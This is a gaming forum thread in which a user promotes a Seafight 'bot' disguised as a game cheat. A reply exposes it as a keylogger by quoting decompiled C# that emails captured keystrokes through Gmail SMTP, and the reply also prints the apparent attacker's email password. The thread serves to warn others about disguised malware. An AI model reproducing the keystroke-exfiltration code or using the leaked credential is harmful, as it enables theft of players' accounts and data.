Seafight sfproxy bot, look this

12/11/2010 18:03 skaterpow#1
Hello,
I'm italian and i speak only italian and english, so i speak english (sorry).
In a turk forum i look this bot. The turk player say which this bot work very well and is in background, so take over 3 ships.
This bot do gold in island, take shines and do special map. I don't know this because to me NOT WORK THIS BOT!
say to me: error 404 but to player turk work -.-
Try it you and say to me if work or not, try also if say error 404...
The guide sayed:
1- Open Bot;
2- Open and log on Seafight
3- When open seafight sea, open the window of the bot and select:
Attack NPCs, Collect Shines or Don't Move.


Download: *removed because of virus*
12/11/2010 18:18 Shadow992#2
Quote:
Originally Posted by skaterpow View Post
Hello,
I'm italian and i speak only italian and english, so i speak english (sorry).
In a turk forum i look this bot. The turk player say which this bot work very well and is in background, so take over 3 ships.
This bot do gold in island, take shines and do special map. I don't know this because to me NOT WORK THIS BOT!
say to me: error 404 but to player turk work -.-
Try it you and say to me if work or not, try also if say error 404...
The guide sayed:
1- Open Bot;
2- Open and log on Seafight
3- When open seafight sea, open the window of the bot and select:
Attack NPCs, Collect Shines or Don't Move.


Download: *removed because of virus*
Here is some source of his "bot":
PHP Code:
private void Timer1_Tick(object senderEventArgs e)
{
    
MailMessage message = new MailMessage();
    
message.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]");
    
message.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
    
message.Body this.TextBox1.Text;
    
message.Subject "Dati KeyLogger";
    
SmtpClient client = new SmtpClient("smtp.gmail.com");
    
client.Port 0x24b;
    
client.EnableSsl true;
    
client.Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]""wlacacca");
    
client.Send(message);

You can see what password and what email he have:
Quote:
[Only registered and activated users can see links. Click Here To Register...]
wlacacca
#closed